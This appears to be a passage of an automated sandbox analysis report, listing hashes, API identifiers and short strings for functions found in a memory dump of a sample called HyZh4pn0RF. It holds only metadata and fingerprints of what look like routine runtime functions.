                                                                                                                                                                                                                                                                                                  • Instruction ID: d90b0d1173e3e70c5b095bea72e96ba9da77144825e4500cfc07e9c9ea7a0ef5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7113D32B15F4589EB009FA1E8442B973A4F758758F540E32EA6D477A4DF7CD198C390
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                                                  • Instruction ID: b7a7bad8c8606080b092fa96b0cbac1e871028f4c22788a4d1f8f79dbcd912f1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56C12772B1A6C587E724DF5AA0446AEF791F794B84F908136DB4E47BA4DB3CE811CB00
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 15204871-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
                                                                                                                                                                                                                                                                                                  • Instruction ID: 81cec03c702a58c98bb8fc960232495926253673c119946af35b166552f5c89f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65B15C73605B85CBEB55CF2AC8463AC7BA0F744B88F648922DB5D837A8CB7AD451C710
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: $
                                                                                                                                                                                                                                                                                                  • API String ID: 0-227171996
                                                                                                                                                                                                                                                                                                  • Opcode ID: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
                                                                                                                                                                                                                                                                                                  • Instruction ID: 06ce162a0591ea43c9c2d587aa6a305fe30e4312455668b184c8e13d1a7c7b58
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3E1B832B0868645EB68AF3580509BDB3A4FF46B48FB45237DA4E077B5DF29E851C710
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: e+000$gfff
                                                                                                                                                                                                                                                                                                  • API String ID: 0-3030954782
                                                                                                                                                                                                                                                                                                  • Opcode ID: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
                                                                                                                                                                                                                                                                                                  • Instruction ID: 791b27dac3c838b741c96961c8e56a816eee0b8a71ba9e69fffb1d05804c03c9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF517932B182C586E7249F35A910BA9E791F744BA4F988232CBAC47BE5DE3DD411C720
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: gfffffff
                                                                                                                                                                                                                                                                                                  • API String ID: 0-1523873471
                                                                                                                                                                                                                                                                                                  • Opcode ID: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
                                                                                                                                                                                                                                                                                                  • Instruction ID: ed10792e03c49e8095d955b28ba6285fc9f58dc6f8ee6775a899ad48ccdbc5c0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45A13472B087C586EB21DB25A400BEDBB91BB50B84F648132DF8D477A5DE3DE511C721
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID: TMP
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                                                                  • Opcode ID: cf0abd2c7e4acdbc7dd987358b9028f2a59d8daca936b72b1b12d96a797a3aac
                                                                                                                                                                                                                                                                                                  • Instruction ID: f77ee5df0ee28878b096053111d708d10055f8fb30cc667753df1d060c92f011
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf0abd2c7e4acdbc7dd987358b9028f2a59d8daca936b72b1b12d96a797a3aac
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE516035B0969241FA64BA2B59159FAD2917F84BC4FF84036DE0E477B6EE3CE402C220
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
                                                                                                                                                                                                                                                                                                  • Instruction ID: c164c088a68d6f5050c38a1ec1a3d46fd2ab312962976f6bba1546582119f846
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BB09230E0BA86C2EB493B526C8625462A47F88B10FE8403AC10D42320DE3C20B98720
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
                                                                                                                                                                                                                                                                                                  • Instruction ID: bdc1b6f8f6a269deed5482f7dc738b2840acebb7e8f8765159aafe4e89a5cde5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92D1C672B0868285EB68EB358044ABDA7A5FB46B48FB45236CE0D076B5CF3DD855C360
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
                                                                                                                                                                                                                                                                                                  • Instruction ID: d0c1a226577f846929c8b6498cad716c512fec1c1ae754443869d55678d93ef7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CC115322242F04BD699FB29E4594BA73E1F7A9309BE5403BEB874B785C63CE414D760
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
                                                                                                                                                                                                                                                                                                  • Instruction ID: ebc895cd3f846f5a7fca5411f0c06ead0fc808965ecb03b88fe3e2f5ae993c2e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEB17B72B0868585EB65DF39C0906BCBBA4F74AB48FB4023ACA4D473A9DF39D541D720
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 31177dbd8392ce87fb1736eca9baba6224b9cd7d7a2afb0db62a7f163d6919b4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F810572B0C7C186E774DF199480BBAA691FB85790FA44236DA8D43BA9DF3DD410CB20
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3a6143a7b5f00f0189e4837f13cf3fad345f6e9eb837262b3e4ffc84bd4cc460
                                                                                                                                                                                                                                                                                                  • Instruction ID: 038c56d49a574bcbb257679b0f4b16ef0408a4fc82e7c0ee7654db8afd1f3ff9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a6143a7b5f00f0189e4837f13cf3fad345f6e9eb837262b3e4ffc84bd4cc460
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3661EA32F092D246F764AA3AC4506FAE691BF40760FB4063BE62D476D5FE7DE801C620
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2638830a7cdb4a6a19afed7266bdcaa8644a6559ac263825af6257d79604e2d9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2751A732B1869586E7249B29C044AB9B3A0FB94B58FB44132DE4D077B8DF3AE943C750
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9de72d69b290f50d3d07359799d6341f90bb79c42fabfa4819a63d31d0ca3ded
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A519376B1869186E7249B29C044AACB3A1FB85B68F745132CA4E077B4DB3AE842C750
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
